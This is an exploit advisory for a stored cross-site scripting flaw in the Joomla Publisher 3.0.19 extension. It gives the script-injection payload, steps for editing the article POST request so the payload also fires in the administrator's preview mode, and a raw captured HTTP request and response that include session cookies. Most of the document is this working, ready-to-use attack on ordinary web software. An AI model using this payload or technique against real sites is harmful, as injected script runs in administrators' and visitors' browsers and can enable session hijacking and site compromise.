Joomla Publisher 3.0.19 Cross Site Scripting

`# Exploit Title: Joomla Publisher V 3.0.19 Stored XSS  
# Date: 03.11.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://publisher.ijoomla.com/demo  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest.vincent.blogspot.com/  
# PoC: https://pentestvincent.blogspot.com/2020/11/joomla-publisher-v-3019-stored-xss.html  
  
Poc:  
  
We have stored xss and stored html injection in Publisher v 3.0.19.  
  
I put there is one interesting method in the body "Article" with Method Post.  
  
Create article and put simple xss code :  
  
""><script>alert("Hello")</script>  
  
And click "submit article".  
  
XSS code is works..  
  
https://ijoomlademo.com/administrator/index.php?option=com_publisher&controller=articles  
  
https://imgur.com/a/ylpLcJV  
  
https://imgur.com/a/XHNHp4c  
  
But it doesn't work in preview mode.  
  
https://imgur.com/a/1BG07Mn  
  
The administrator can check articles in preview mode. What do we do?  
  
Let's use the addon in the firefox "HTTP Live Headers" and change our  
article with the Post Method.  
  
""><script>alert("Hello")</script><body  
background="https://pbs.twimg.com/media/D_dG89lXkAAU8P4.png">  
  
Open Http Live Headers, Edit Article, Save this and Change Post  
Request and send this.  
  
https://imgur.com/a/ogpYEGf  
  
Let's see what we have in preview mode.  
  
https://imgur.com/a/QvQZNNw  
  
https://imgur.com/a/Vzjxfpd  
  
  
..................................................................................  
https://ijoomlademo.com/index.php/publisher/my-articles/articlesedit/core_joomla/32  
  
Host: ijoomlademo.com  
  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)  
Gecko/20100101 Firefox/82.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 341  
  
Origin: https://ijoomlademo.com  
  
Connection: keep-alive  
  
Referer: https://ijoomlademo.com/index.php/publisher/my-articles/articlesedit/core_joomla/32  
  
Cookie: __cfduid=dbbb4e38c58b733c11296ba0adf86aee61604442214;  
c1095a90cabfb304b8e3637676e86d5a=91ionv40vq50bcapv23954o6kn;  
4681557252fe8ff3df4a28d60cb41dc7=lpulqnuggmo1p7cs806stm6t5s;  
joomla_user_state=logged_in;  
currentURI=https%3A%2F%2Fijoomlademo.com%2Findex.php%3Foption%3Dcom_community%26view%3Dfriends%26task%3DajaxAutocomplete%26allfriends%3D1  
  
Upgrade-Insecure-Requests: 1  
  
title=test&heading=test&cat_id=8&content=<p>""><script>alert("Hello")</script><br></p>&id=32&controller=articlesedit&option=com_publisher&editor_name=&task=store&authid=231&media=&type=core_joomla&article_id=28&mandatory_status=approved&article_status=1&edit_a=1&edit_s=approved  
  
POST: HTTP/2.0 303 See Other  
  
date: Tue, 03 Nov 2020 22:32:40 GMT  
  
content-type: text/html; charset=utf-8  
  
x-powered-by: PHP/7.2.33  
  
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"  
  
location: /index.php/publisher/my-articles/articlesedit/32  
  
expires: Wed, 17 Aug 2005 00:00:00 GMT  
  
last-modified: Tue, 03 Nov 2020 22:32:40 GMT  
  
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
  
pragma: no-cache  
  
cf-cache-status: DYNAMIC  
  
cf-request-id: 0631d6bb1e00000057b093c000000001  
  
expect-ct: max-age=604800,  
report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
  
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4BKJ9XaQXZogqrRC4jLDlbWNJ3lklLos6kkmngfBver4wHRDvpbqrVk89c6FtvKZHPe8wAmywNqRUdxp2zDfVbi9ajV4PStFG5DOdB7MvvA%3D"}],"group":"cf-nel","max_age":604800}  
  
nel: {"report_to":"cf-nel","max_age":604800}  
  
server: cloudflare  
  
cf-ray: 5ec98d71cf160057-DME  
  
X-Firefox-Spdy: h2  
  
..................................................................................  
`